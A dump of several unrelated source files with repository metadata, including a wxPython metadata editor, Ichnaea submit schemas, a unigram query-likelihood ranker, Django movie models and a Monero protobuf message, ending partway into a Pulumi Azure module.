def __init__(self, parent, ID, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=0):
wx.ListCtrl.__init__(self, parent, ID, pos, size, style)
TextEditMixin.__init__(self)
Authors: Steve Zatz, Pim Van Heuven (pim@think-wize.com)
"""
editorBgColour = wx.Colour(255,255,175) # Yellow
editorFgColour = wx.Colour(0,0,0) # black
def __init__(self):
#editor = wx.TextCtrl(self, -1, pos=(-1,-1), size=(-1,-1),
# style=wx.TE_PROCESS_ENTER|wx.TE_PROCESS_TAB \
# |wx.TE_RICH2)
self.make_editor()
self.Bind(wx.EVT_TEXT_ENTER, self.CloseEditor)
self.GetMainWindow().Bind(wx.EVT_RIGHT_DOWN, self.OnLeftDown)
self.GetMainWindow().Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDown)
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected)
self.editableColumns = []
def makeColumnEditable(self, col):
self.editableColumns.append(col)
def make_editor(self, col_style=wx.LIST_FORMAT_LEFT):
style =wx.TE_PROCESS_ENTER|wx.TE_PROCESS_TAB|wx.TE_RICH2
style |= {wx.LIST_FORMAT_LEFT: wx.TE_LEFT,
wx.LIST_FORMAT_RIGHT: wx.TE_RIGHT,
wx.LIST_FORMAT_CENTRE : wx.TE_CENTRE
}[col_style]
editor = wx.TextCtrl(self, -1, style=style)
editor.SetBackgroundColour(self.editorBgColour)
editor.SetForegroundColour(self.editorFgColour)
font = self.GetFont()
editor.SetFont(font)
self.curRow = 0
self.curCol = 0
editor.Hide()
if hasattr(self, 'editor'):
self.editor.Destroy()
self.editor = editor
self.col_style = col_style
self.editor.Bind(wx.EVT_CHAR, self.OnChar)
self.editor.Bind(wx.EVT_KILL_FOCUS, self.CloseEditor)
def OnItemSelected(self, evt):
self.curRow = evt.GetIndex()
evt.Skip()
def OnChar(self, event):
''' Catch the TAB, Shift-TAB, cursor DOWN/UP key code
so we can open the editor at the next column (if any).'''
keycode = event.GetKeyCode()
if keycode == wx.WXK_TAB and event.ShiftDown():
self.CloseEditor()
if self.curCol-1 >= 0:
self.OpenEditor(self.curCol-1, self.curRow)
elif keycode == wx.WXK_TAB:
self.CloseEditor()
if self.curCol+1 < self.GetColumnCount():
self.OpenEditor(self.curCol+1, self.curRow)
elif keycode == wx.WXK_ESCAPE:
self.CloseEditor()
elif keycode == wx.WXK_DOWN:
self.CloseEditor()
if self.curRow+1 < self.GetItemCount():
self._SelectIndex(self.curRow+1)
self.OpenEditor(self.curCol, self.curRow)
elif keycode == wx.WXK_UP:
self.CloseEditor()
if self.curRow > 0:
self._SelectIndex(self.curRow-1)
self.OpenEditor(self.curCol, self.curRow)
else:
event.Skip()
def OnLeftDown(self, evt=None):
''' Examine the click and double
click events to see if a row has been click on twice. If so,
determine the current row and columnn and open the editor.'''
if self.editor.IsShown():
self.CloseEditor()
x,y = evt.GetPosition()
#print x,y
item, flags, col = self.HitTest((x,y))
print((item, flags, col))
# if row != self.curRow: # self.curRow keeps track of the current row
# evt.Skip()
# return
# the following should really be done in the mixin's init but
# the wx.ListCtrl demo creates the columns after creating the
# ListCtrl (generally not a good idea) on the other hand,
# doing this here handles adjustable column widths
# self.col_locs = [0]
# loc = 0
# for n in range(self.GetColumnCount()):
# loc = loc + self.GetColumnWidth(n)
# self.col_locs.append(loc)
#
#
# col = bisect(self.col_locs, x+self.GetScrollPos(wx.HORIZONTAL)) - 1
#row = item
if col in self.editableColumns:
self.OpenEditor(col, item)
def OpenEditor(self, col, row):
''' Opens an editor at the current position. '''
# give the derived class a chance to Allow/Veto this edit.
evt = wx.ListEvent(wx.wxEVT_COMMAND_LIST_BEGIN_LABEL_EDIT, self.GetId())
evt.m_itemIndex = row
evt.m_col = col
item = self.GetItem(row, col)
evt.m_item.SetId(item.GetId())
evt.m_item.SetColumn(item.GetColumn())
evt.m_item.SetData(item.GetData())
evt.m_item.SetText(item.GetText())
ret = self.GetEventHandler().ProcessEvent(evt)
if ret and not evt.IsAllowed():
return # user code doesn't allow the edit.
if self.GetColumn(col).m_format != self.col_style:
self.make_editor(self.GetColumn(col).m_format)
x0 = self.col_locs[col]
x1 = self.col_locs[col+1] - x0
scrolloffset = self.GetScrollPos(wx.HORIZONTAL)
# scroll forward
if x0+x1-scrolloffset > self.GetSize()[0]:
if wx.Platform == "__WXMSW__":
# don't start scrolling unless we really need to
offset = x0+x1-self.GetSize()[0]-scrolloffset
# scroll a bit more than what is minimum required
# so we don't have to scroll everytime the user presses TAB
# which is very tireing to the eye
addoffset = self.GetSize()[0]/4
# but be careful at the end of the list
if addoffset + scrolloffset < self.GetSize()[0]:
offset += addoffset
self.ScrollList(offset, 0)
scrolloffset = self.GetScrollPos(wx.HORIZONTAL)
else:
# Since we can not programmatically scroll the ListCtrl
# close the editor so the user can scroll and open the editor
# again
self.editor.SetValue(self.GetItem(row, col).GetText())
self.curRow = row
self.curCol = col
self.CloseEditor()
return
y0 = self.GetItemRect(row)[1]
editor = self.editor
editor.SetDimensions(x0-scrolloffset,y0, x1,-1)
editor.SetValue(self.GetItem(row, col).GetText())
editor.Show()
editor.Raise()
editor.SetSelection(-1,-1)
editor.SetFocus()
self.curRow = row
self.curCol = col
# FIXME: this function is usually called twice - second time because
# it is binded to wx.EVT_KILL_FOCUS. Can it be avoided? (MW)
def CloseEditor(self, evt=None):
''' Close the editor and save the new value to the ListCtrl. '''
if not self.editor.IsShown():
return
text = self.editor.GetValue()
self.editor.Hide()
self.SetFocus()
# post wxEVT_COMMAND_LIST_END_LABEL_EDIT
# Event can be vetoed. It doesn't has SetEditCanceled(), what would
# require passing extra argument to CloseEditor()
evt = wx.ListEvent(wx.EVT_LIST_END_LABEL_EDIT.evtType[0], self.GetId())
evt.m_itemIndex = self.curRow
evt.m_col = self.curCol
item = self.GetItem(self.curRow, self.curCol)
evt.m_item.SetId(item.GetId())
evt.m_item.SetColumn(item.GetColumn())
evt.m_item.SetData(item.GetData())
evt.m_item.SetText(text) #should be empty string if editor was canceled
ret = self.GetEventHandler().ProcessEvent(evt)
if not ret or evt.IsAllowed():
if self.IsVirtual():
# replace by whather you use to populate the virtual ListCtrl
# data source
self.SetVirtualData(self.curRow, self.curCol, text)
else:
self.SetStringItem(self.curRow, self.curCol, text)
self.RefreshItem(self.curRow)
def _SelectIndex(self, row):
listlen = self.GetItemCount()
if row < 0 and not listlen:
return
if row > (listlen-1):
row = listlen -1
self.SetItemState(self.curRow, ~wx.LIST_STATE_SELECTED,
wx.LIST_STATE_SELECTED)
self.EnsureVisible(row)
self.SetItemState(row, wx.LIST_STATE_SELECTED,
wx.LIST_STATE_SELECTED)
#----------------------------------------------------------------------------
#----------------------------------------------------------------------------
class EditableTreeList(gizmos.TreeListCtrl, TextEditMixin):
def __init__(self, parent, id=-1, style=wx.TR_DEFAULT_STYLE):
print(style)
gizmos.TreeListCtrl.__init__(self,parent, id, style=style)
TextEditMixin.__init__(self)
class MetadataPanel(wx.Panel):
def __init__(self, parent, mdh, editable=True, refreshable=True):
self.mdh=mdh
wx.Panel.__init__(self, parent, -1)
#self.Bind(wx.EVT_SIZE, self.OnSize)
sizer1 = wx.BoxSizer(wx.VERTICAL)
self.tree = gizmos.TreeListCtrl(self, -1, style =
wx.TR_DEFAULT_STYLE
#| wx.TR_HAS_BUTTONS
#| wx.TR_TWIST_BUTTONS
#| wx.TR_ROW_LINES
#| wx.TR_EDIT_LABELS
| wx.TR_COLUMN_LINES
#| wx.TR_NO_LINES
| wx.TR_FULL_ROW_HIGHLIGHT
)
# create some columns
self.tree.AddColumn("Entry")
self.tree.AddColumn("Value")
self.tree.SetMainColumn(0) # the one with the tree in it...
self.tree.SetColumnWidth(0, 300)
self.tree.SetColumnWidth(1, 300)
self.root = self.tree.AddRoot("Metadata")
self.tree.SetItemText(self.root, "root", 0)
self.paths = {}
nmdh = NestedClassMDHandler(mdh)
self.addEntries(nmdh, self.root)
if editable:
self.editableCols = [1]
else:
self.editableCols = []
#entryNames = self.mdh.getEntryNames()
# for k in nmdh.__dict__.keys():
# #txt = "Item %d" % x
# child = self.tree.AppendItem(self.root, k)
# self.tree.SetItemText(child, txt + "(c1)", 1)
self.tree.ExpandAll(self.root)
self.tree.GetMainWindow().Bind(wx.EVT_RIGHT_DOWN, self.OnRightDown)
self.tree.GetMainWindow().Bind(wx.EVT_RIGHT_UP, self.OnRightUp)
self.tree.Bind(wx.EVT_TREE_END_LABEL_EDIT, self.OnEndEdit)
self.tree.Bind(wx.EVT_TREE_BEGIN_LABEL_EDIT, self.OnBeginEdit)
#self.tree.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnActivate)
sizer1.Add(self.tree, 1, wx.EXPAND, 0)
if refreshable == True:
bRefresh = wx.Button(self, -1, 'Refresh')
bRefresh.Bind(wx.EVT_BUTTON, self.rebuild)
sizer1.Add(bRefresh, 0, wx.ALL|wx.ALIGN_RIGHT, 5)
self.SetSizerAndFit(sizer1)
def addEntries(self, mdh, node, entrypath=''):
#en = []
for k in mdh.__dict__.keys():
child = self.tree.AppendItem(node, k)
self.tree.SetItemText(child, k, 0)
if mdh.__dict__[k].__class__ == NestedClassMDHandler:
self.addEntries(mdh.__dict__[k], child, '.'.join((entrypath, k)))
else:
self.tree.SetItemText(child, str(mdh.getEntry(k)), 1)
self.paths[child] = '.'.join((entrypath, k))
def rebuild(self, event=None):
self.tree.DeleteRoot()
self.root = self.tree.AddRoot("Metadata")
self.tree.SetItemText(self.root, "root", 0)
nmdh = NestedClassMDHandler(self.mdh)
self.addEntries(nmdh, self.root)
self.tree.ExpandAll(self.root)
#def OnActivate(self, evt):
#self.log.write('OnActivate: %s' % self.tree.GetItemText(evt.GetItem()))
# def OnRightDown(self, evt):
# pos = evt.GetPosition()
# item, flags, col = self.tree.HitTest(pos)
# if item:
# self.log.write('Flags: %s, Col:%s, Text: %s' %
# (flags, col, self.tree.GetItemText(item, col)))
def OnRightDown(self, event):
pt = event.GetPosition();
item, flags, col = self.tree.HitTest(pt)
if item:
# self.log.WriteText("OnRightClick: %s, %s, %s\n" %
# (self.tree.GetItemText(item), type(item), item.__class__))
self.tree.SelectItem(item)
def OnRightUp(self, event):
pt = event.GetPosition();
item, flags, col = self.tree.HitTest(pt)
#print item, flags, col
if item and col in self.editableCols:
#self.log.WriteText("OnRightUp: %s (manually starting label edit)\n"
# % self.tree.GetItemText(item))
self.tree.EditLabel(item, col)
def OnBeginEdit(self, event):
#self.log.WriteText("OnBeginEdit\n")
# show how to prevent edit...
item = event.GetItem()
entryName = self.GetItemFullname(item)
if not entryName in self.mdh.getEntryNames():
event.Veto()
def OnEndEdit(self, event):
# self.log.WriteText("OnEndEdit: %s %s\n" %
# (event.IsEditCancelled(), event.GetLabel()) )
# show how to reject edit, we'll not allow any digits
if not event.IsEditCancelled():
item = event.GetItem()
newLabel = event.GetLabel()
entryName = self.GetItemFullname(item)
if entryName in self.mdh.getEntryNames():
try:
ne = self.mdh.getEntry(entryName).__class__(newLabel)
#print ne
self.mdh.setEntry(entryName, ne)
except:
event.Veto()
#print event.GetLabel()
def GetItemFullname(self, item):
cp = item
parents = []
while not cp == self.root:
parents.append(cp)
cp = self.tree.GetItemParent(cp)
names = [self.tree.GetItemText(p) for p in parents]
return '.'.join(names[::-1])
def OnSize(self, evt):
self.tree.SetSize(self.GetSize())
| [
"willi4m@zju.edu.cn"
] | willi4m@zju.edu.cn |
9d296c259a2e461bf5c93b18863d06131d8b435c | 9e2d79a2cf1dbeaffe8ef897bb53f94af8b5b68c | /ichnaea/api/submit/schema_v0.py | 369e4e1815bfa4d4f1b610b8b794b4d3dfea8f60 | [
"Apache-2.0"
] | permissive | amolk4games/ichnaea | a7d1cbd12b6aa5c0d877fca380080b08fcff24b8 | 907c542da05b428c8e994bce1537390e22b3ca58 | refs/heads/master | 2021-01-19T07:21:54.851167 | 2016-04-08T15:20:37 | 2016-04-08T15:21:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,408 | py | """
Colander schemata describing the public v1/submit HTTP API.
"""
import colander
from ichnaea.api.schema import (
OptionalBoundedFloatNode,
OptionalIntNode,
OptionalMappingSchema,
OptionalNode,
OptionalSequenceSchema,
OptionalStringNode,
UnixTimeFromString,
)
class BlueV0Schema(OptionalMappingSchema):
key = OptionalStringNode(to_name='macAddress')
age = OptionalIntNode()
name = OptionalStringNode()
signal = OptionalIntNode(to_name='signalStrength')
def deserialize(self, data):
data = super(BlueV0Schema, self).deserialize(data)
if 'macAddress' not in data:
return colander.drop
return data
class CellV0Schema(OptionalMappingSchema):
radio = OptionalStringNode(to_name='radioType')
mcc = OptionalIntNode(to_name='mobileCountryCode')
mnc = OptionalIntNode(to_name='mobileNetworkCode')
lac = OptionalIntNode(to_name='locationAreaCode')
cid = OptionalIntNode(to_name='cellId')
age = OptionalIntNode()
asu = OptionalIntNode()
psc = OptionalIntNode(to_name='primaryScramblingCode')
serving = OptionalIntNode()
signal = OptionalIntNode(to_name='signalStrength')
ta = OptionalIntNode(to_name='timingAdvance')
class WifiV0Schema(OptionalMappingSchema):
key = OptionalStringNode(to_name='macAddress')
age = OptionalIntNode()
channel = OptionalIntNode()
frequency = OptionalIntNode()
radio = OptionalStringNode(to_name='radioType')
signal = OptionalIntNode(to_name='signalStrength')
signalToNoiseRatio = OptionalIntNode()
ssid = OptionalStringNode()
def deserialize(self, data):
data = super(WifiV0Schema, self).deserialize(data)
if 'macAddress' not in data:
return colander.drop
return data
class BaseReportV0Schema(OptionalMappingSchema):
lat = OptionalBoundedFloatNode(to_name='latitude')
lon = OptionalBoundedFloatNode(to_name='longitude')
time = OptionalNode(UnixTimeFromString(), to_name='timestamp')
accuracy = OptionalBoundedFloatNode()
age = OptionalIntNode()
altitude = OptionalBoundedFloatNode()
altitude_accuracy = OptionalBoundedFloatNode(
to_name='altitudeAccuracy')
heading = OptionalBoundedFloatNode()
pressure = OptionalBoundedFloatNode()
radio = OptionalStringNode(to_name='radioType')
speed = OptionalBoundedFloatNode()
source = OptionalStringNode()
class ReportV0Schema(BaseReportV0Schema):
_position_fields = (
'latitude',
'longitude',
'accuracy',
'altitude',
'altitudeAccuracy',
'age',
'heading',
'pressure',
'speed',
'source',
)
@colander.instantiate(to_name='bluetoothBeacons', missing=())
class blue(OptionalSequenceSchema): # NOQA
sequence_item = BlueV0Schema()
@colander.instantiate(to_name='cellTowers', missing=())
class cell(OptionalSequenceSchema): # NOQA
sequence_item = CellV0Schema()
@colander.instantiate(to_name='wifiAccessPoints', missing=())
class wifi(OptionalSequenceSchema): # NOQA
sequence_item = WifiV0Schema()
def deserialize(self, data):
data = super(ReportV0Schema, self).deserialize(data)
if (data is colander.drop or
data is colander.null): # pragma: no cover
return colander.drop
if not (data.get('bluetoothBeacons') or data.get('cellTowers') or
data.get('wifiAccessPoints')):
return colander.drop
top_radio = data.get('radioType', None)
for cell in data.get('cellTowers', ()):
if 'radioType' not in cell or not cell['radioType'] and top_radio:
cell['radioType'] = top_radio
if cell.get('radioType') == 'umts':
cell['radioType'] = 'wcdma'
if 'radioType' in data:
del data['radioType']
position_data = {}
for field in self._position_fields:
if field in data:
position_data[field] = data[field]
del data[field]
if position_data:
data['position'] = position_data
return data
class SubmitV0Schema(OptionalMappingSchema):
@colander.instantiate()
class items(OptionalSequenceSchema): # NOQA
report = ReportV0Schema()
SUBMIT_V0_SCHEMA = SubmitV0Schema()
| [
"hanno@hannosch.eu"
] | hanno@hannosch.eu |
fe972e3f143c34206e2f70eec1e9dd21dc51fb48 | f85c41af07c89af418b7565d289e8237ebe433f1 | /stubs/twisted/web/server.pyi | 201fab94b71c99ae8d97155f18bb20ed7273cc8f | [
"Apache-2.0"
] | permissive | matrix-org/sydent | 3b58e9488ce594b4fc803f9114d9b137a500611c | 77cb99e3fc6a77c3bc2b66005770bd940060fae4 | refs/heads/main | 2023-08-04T09:52:33.984167 | 2023-07-31T10:53:38 | 2023-07-31T10:53:38 | 22,844,878 | 269 | 103 | Apache-2.0 | 2023-09-12T11:17:20 | 2014-08-11T15:52:07 | Python | UTF-8 | Python | false | false | 669 | pyi | from typing import Callable, Optional
from twisted.web import http
from twisted.web.resource import IResource
class Request(http.Request): ...
# A requestFactory is allowed to be "[a] factory which is called with (channel)
# and creates L{Request} instances.".
RequestFactory = Callable[[http.HTTPChannel], Request]
class Site(http.HTTPFactory):
displayTracebacks: bool
def __init__(
self,
resource: IResource,
requestFactory: Optional[RequestFactory] = ...,
# Args and kwargs get passed to http.HTTPFactory. But we don't use them.
*args: object,
**kwargs: object,
): ...
NOT_DONE_YET = object # Opaque
| [
"noreply@github.com"
] | matrix-org.noreply@github.com |
eafab3a40a8fcd6e8f3c5f79a7ab45fb09a1997d | e27333261b8e579564016c71d2061cc33972a8b8 | /development_codes/Backend/.history/UnigramLanguageModelImplementation_20210809204100.py | d1971d7e1650058901c9456feb9356fa2684514b | [] | no_license | Dustyik/NewsTweet_InformationRetrieval | 882e63dd20bc9101cbf48afa6c3302febf1989b1 | d9a6d92b51c288f5bcd21ea1cc54772910fa58f7 | refs/heads/master | 2023-07-01T09:12:53.215563 | 2021-08-12T08:28:33 | 2021-08-12T08:28:33 | 382,780,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,156 | py | import math
from IPython.display import display
import sys
from BM25implementation import QueryParsers
ALPHA = 0.75
NORMALIZE_PROBABILITY = True
class UnigramLanguageModel:
def __init__(self, tweets_data): #tweets is a pandas dataframe
self.tweets_data = tweets_data
self.wordsCollectionFrequencyDictionary = self.create_words_frequency_dict(tweets_data)
def create_words_frequency_dict(self, tweets_data, collection = True):
word_frequency_dictionary = {}
if collection:
tweets = tweets_data.clean_text.tolist()
for sentence in tweets:
sentence_list = list(sentence.split(" "))
for word in sentence_list:
if word in word_frequency_dictionary:
word_frequency_dictionary[word] += 1
else:
word_frequency_dictionary[word] = 1
else:
for word in tweets_data:
if word in word_frequency_dictionary:
word_frequency_dictionary[word] += 1
else:
word_frequency_dictionary[word] = 1
return word_frequency_dictionary
def calculate_total_no_of_words(self, wordsCollectionFrequencyDictionary):
values = wordsCollectionFrequencyDictionary.values()
total = sum(values)
return total
def calculate_unigram_probability(self, word: str, wordCollectionFrequencyDictionary):
totalNumberOfWords = self.calculate_total_no_of_words(wordCollectionFrequencyDictionary)
try:
value = wordCollectionFrequencyDictionary[word]/totalNumberOfWords
except KeyError as ke:
value = 1/totalNumberOfWords #add one smoothing for documents
print (word, value)
return value
def calculate_interpolated_sentence_probability(self, querySentenceList:list, document, alpha=ALPHA, normalize_probability=NORMALIZE_PROBABILITY):
total_score = 1
documentListOfStrings = list(document.split(" "))
documentWordFrequencyDictionary = self.create_words_frequency_dict(documentListOfStrings, collection = False)
print (querySentenceList)
for word in querySentenceList:
print (word)
score_of_word = alpha*(self.calculate_unigram_probability(word, documentWordFrequencyDictionary)) + 0 #(1 - alpha)*(self.calculate_unigram_probability(word, self.wordsCollectionFrequencyDictionary))
total_score *= score_of_word
if normalize_probability == True:
return total_score
else:
return (math.log(total_score)/math.log(2))
def getQueryLikelihoodModelScore(self, querySentence:list):
querySentenceList = QueryParsers(querySentence).query
self.tweets_data["QueryLikelihoodModelScore"] = self.tweets_data.apply(lambda row: self.calculate_interpolated_sentence_probability(querySentenceList, row.clean_text), axis = 1)
self.tweets_data.sort_values(by='QueryLikelihoodModelScore',ascending=False,inplace=True)
return self.tweets_data
| [
"chiayik_tan@mymail.sutd.edu.sg"
] | chiayik_tan@mymail.sutd.edu.sg |
e80525d3c4e2b38c006b4ba26ad3d3c803612081 | 99c4d4a6592fded0e8e59652484ab226ac0bd38c | /code/batch-1/vse-naloge-brez-testov/DN5-M-155.py | 8589f4c179dad3cc22b745e3fc1e830f8a3794f4 | [] | no_license | benquick123/code-profiling | 23e9aa5aecb91753e2f1fecdc3f6d62049a990d5 | 0d496d649247776d121683d10019ec2a7cba574c | refs/heads/master | 2021-10-08T02:53:50.107036 | 2018-12-06T22:56:38 | 2018-12-06T22:56:38 | 126,011,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,706 | py | def unikati(s):
seznam = []
for i in s:
if i not in seznam:
seznam.append(i)
return seznam
def avtor(tvit):
return tvit.split(":")[0]
def vsi_avtorji(tviti):
avtorji = []
for zapis in tviti:
avtorji.append(avtor(zapis))
return unikati(avtorji)
def izloci_besedo(beseda):
return "".join(i for i in beseda if i.isalnum() or i == "-")
def se_zacne_z(tvit, c):
return [izloci_besedo(i) for i in tvit.split() if i.startswith(c)]
def zberi_se_zacne_z(tviti, c):
seznam = []
for tvit in tviti:
seznam += se_zacne_z(tvit, c)
return unikati(seznam)
def vse_afne(tviti):
seznam = []
for i in tviti:
for j in i.split():
if j.startswith("@"):
seznam.append(izloci_besedo(j))
return unikati(seznam)
def vsi_hashtagi(tviti):
seznam = []
for i in tviti:
for j in i.split():
if j.startswith("#"):
seznam.append(izloci_besedo(j))
return unikati(seznam)
def vse_osebe(tviti):
seznam = []
for tvit in tviti:
seznam.append(avtor(tvit))
seznam += vse_afne(tviti)
return unikati(sorted(seznam))
def custva(tviti, hashtagi):
seznam = []
for tvit in tviti:
for hash in hashtagi:
if hash in tvit:
seznam.append(avtor(tvit))
return unikati(sorted(seznam))
def se_poznata(tviti, oseba1, oseba2):
slovar = {}
for tvit in tviti:
slovar[avtor(tvit)] = [izloci_besedo(i) for i in tvit.split() if i.startswith("@")]
try:
if oseba1 in slovar[oseba2] or oseba2 in slovar[oseba1]:
return True
except KeyError:
return False
| [
"lenart.motnikar@gmail.com"
] | lenart.motnikar@gmail.com |
a25e272a7d02407e4dcb9451996d404845773daf | 22bf910b64283b3c15cc4d80542e83fa89e9f09d | /monero_glue/messages/MoneroGetTxKeyRequest.py | b935838df9f412978aeb49278af672fb07c50028 | [
"MIT"
] | permissive | ph4r05/monero-agent | 24ed1aa17d6616b2ae6bcdb7b9997f982f8b7b5d | 0bac0e6f33142b2bb885565bfd1ef8ac04559280 | refs/heads/master | 2022-10-18T06:30:43.550133 | 2021-07-01T16:27:56 | 2021-07-01T16:27:56 | 126,215,119 | 24 | 5 | MIT | 2022-09-23T22:53:44 | 2018-03-21T17:18:21 | Python | UTF-8 | Python | false | false | 1,433 | py | # Automatically generated by pb2py
# fmt: off
from .. import protobuf as p
if __debug__:
try:
from typing import Dict, List # noqa: F401
from typing_extensions import Literal # noqa: F401
except ImportError:
pass
class MoneroGetTxKeyRequest(p.MessageType):
MESSAGE_WIRE_TYPE = 550
def __init__(
self,
address_n: List[int] = None,
network_type: int = None,
salt1: bytes = None,
salt2: bytes = None,
tx_enc_keys: bytes = None,
tx_prefix_hash: bytes = None,
reason: int = None,
view_public_key: bytes = None,
) -> None:
self.address_n = address_n if address_n is not None else []
self.network_type = network_type
self.salt1 = salt1
self.salt2 = salt2
self.tx_enc_keys = tx_enc_keys
self.tx_prefix_hash = tx_prefix_hash
self.reason = reason
self.view_public_key = view_public_key
@classmethod
def get_fields(cls) -> Dict:
return {
1: ('address_n', p.UVarintType, p.FLAG_REPEATED),
2: ('network_type', p.UVarintType, 0),
3: ('salt1', p.BytesType, 0),
4: ('salt2', p.BytesType, 0),
5: ('tx_enc_keys', p.BytesType, 0),
6: ('tx_prefix_hash', p.BytesType, 0),
7: ('reason', p.UVarintType, 0),
8: ('view_public_key', p.BytesType, 0),
}
| [
"dusan.klinec@gmail.com"
] | dusan.klinec@gmail.com |
0db085b02f0f82902740aec7e44bb19ae0918fef | 7b4e9342d42be2b55af5dc23a8abedd672d68e99 | /libs/flows/windows/jweb/flow_container.py | d286652e4bd3a203a05068468b2b900f0cf0c236 | [] | no_license | Amal548/QAMA | af5bb335c92a90b461f1ee9a3870435d83d46802 | b5230c51d3bc7bb04b3448d1a1fe5a076d8898d5 | refs/heads/master | 2023-07-12T09:17:04.624677 | 2021-08-06T08:01:11 | 2021-08-06T08:01:11 | 389,595,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,819 | py | import logging
from time import sleep
from MobileApps.libs.ma_misc import ma_misc
from MobileApps.libs.flows.windows.jweb.home import Home
from MobileApps.libs.flows.web.hp_id.hp_id import HPID
from MobileApps.libs.flows.windows.jweb.auth_plugin import AuthPlugin
from MobileApps.libs.flows.windows.jweb.eventing_plugin import EventingPlugin
from MobileApps.resources.const.windows.const import *
class FlowContainer(object):
def __init__(self, driver):
self.driver = driver
self.fd = {"home": Home(driver),
"hpid": HPID(driver, context="NATIVE_APP"),
"auth_plugin": AuthPlugin(driver),
"eventing_plugin": EventingPlugin(driver)}
@property
def flow(self):
return self.fd
# *********************************************************************************
# ACTION FLOWS *
# *********************************************************************************
# ----------------------- FROM HOME -----------------------------
def flow_load_home_screen(self):
"""
Load to Home screen:
-Launch app
"""
app_name = APP_NAME.JWEB
if not self.fd["home"].verify_menu_button():
self.driver.launch_app(app_name)
if self.fd["home"].verify_window_visual_state_normal():
self.fd["home"].click_maximize_window()
def close_jweb_app(self):
'''
This is a method to close jarvis reference app.
:parameter:
:return:
'''
logging.debug("Closing Jarvis App...")
if self.fd["home"].verify_close_window():
self.fd["home"].click_close_window() | [
"amal.muthiah@hp.com"
] | amal.muthiah@hp.com |
d1e693b8016e93dcc0157e1fd514a70256b61cc2 | 2734b77a68f6d7e22e8b823418ad1c59fe1a34af | /opengever/usermigration/exceptions.py | eb73aaf30ee632b9957c748ba72141de5c4b1d33 | [] | no_license | 4teamwork/opengever.core | 5963660f5f131bc12fd0a5898f1d7c8f24a5e2b1 | a01bec6c00d203c21a1b0449f8d489d0033c02b7 | refs/heads/master | 2023-08-30T23:11:27.914905 | 2023-08-25T14:27:15 | 2023-08-25T14:27:15 | 9,788,097 | 19 | 8 | null | 2023-09-14T13:28:56 | 2013-05-01T08:28:16 | Python | UTF-8 | Python | false | false | 96 | py | class UserMigrationException(Exception):
"""An error occured during user migration.
"""
| [
"lukas.graf@4teamwork.ch"
] | lukas.graf@4teamwork.ch |
f17b80dc4d7e285090138061fd5c7212a6c11d43 | 89044f6606e3ccfbbca0b0dacc277497e735d5d4 | /lecture02/exercise02-B/template.py | de5bc2e02d30081a54e08b493b21c899c65425fb | [
"MIT"
] | permissive | nd-cse-34872-su21/cse-34872-su21-examples | 10595f1d53ad3a45fd5e293a8705aefd66bf65c9 | 0294bb0964b502bbb8541054977988c4a3b49dab | refs/heads/master | 2023-05-14T09:55:26.573462 | 2021-06-08T14:23:59 | 2021-06-08T14:23:59 | 370,460,163 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | #!/usr/bin/env python3
import sys
# Functions
LEFT_PBB = ('(', '[', '{')
RIGHT_PBB = (')', ']', '}')
def is_pbbmatched(s):
# TODO: Process string s using a stack to determine if the symbols are balanced
return False
# Main execution
def main():
for line in sys.stdin:
line = line.rstrip()
result = 'Yes' if is_pbbmatched(line) else 'No'
print('{:>10}: {}'.format(line, result))
if __name__ == '__main__':
main()
| [
"pbui@nd.edu"
] | pbui@nd.edu |
5ee64de7a0e5c54c20e9a919092352983197fa28 | edbcb34df3f31bda1e90d9926916da8efc24f65d | /app/models.py | 5130107da2b6efca832994dd037e4bf8af4bad4c | [] | no_license | yuansuixin/movies_project | 74281ceeb6cc6e890c7a7e8d3f9a84e13e2ffdc7 | 8cd5dac957e9475c5f61c4dd648718a8cb782981 | refs/heads/master | 2021-04-05T23:30:57.037168 | 2018-03-14T15:36:55 | 2018-03-14T15:36:55 | 125,233,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | from django.db import models
# Create your models here.
# 用户
class User(models.Model):
# 密码
u_password = models.CharField(max_length=32)
# 昵称
u_name = models.CharField(max_length=20,primary_key=True)
# 头像路径
u_icon = models.ImageField(upload_to='icons')
isDelete = models.BooleanField(default=False)
email = models.CharField(null=True,max_length=16)
class Banner(models.Model):
name = models.CharField(max_length=20)
image = models.ImageField(upload_to='image')
desc = models.CharField(max_length=200)
class Movies(models.Model):
title = models.CharField(max_length=100)
desc = models.CharField(max_length=200)
postid = models.IntegerField()
image = models.ImageField(upload_to='image')
like_num = models.IntegerField(default=0)
request_url = models.CharField(max_length=200,null=True)
is_like = models.BooleanField(default=False)
duration = models.CharField(default=0,max_length=16)
class Like(models.Model):
like_user = models.ForeignKey(User)
like_movies = models.ForeignKey(Movies)
| [
"cyss428@163.com"
] | cyss428@163.com |
242533baba2a20c2d3b4e0423fb84119da1b8406 | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/batch/outputs.py | ed75b44fb3c310c7cc66bfb9b6b27e814a0722b9 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 154,050 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
__all__ = [
'ApplicationPackageReferenceResponse',
'AutoScaleRunErrorResponse',
'AutoScaleRunResponse',
'AutoScaleSettingsResponse',
'AutoStoragePropertiesResponse',
'AutoUserSpecificationResponse',
'AzureBlobFileSystemConfigurationResponse',
'AzureFileShareConfigurationResponse',
'BatchAccountIdentityResponse',
'BatchAccountIdentityResponseUserAssignedIdentities',
'BatchPoolIdentityResponse',
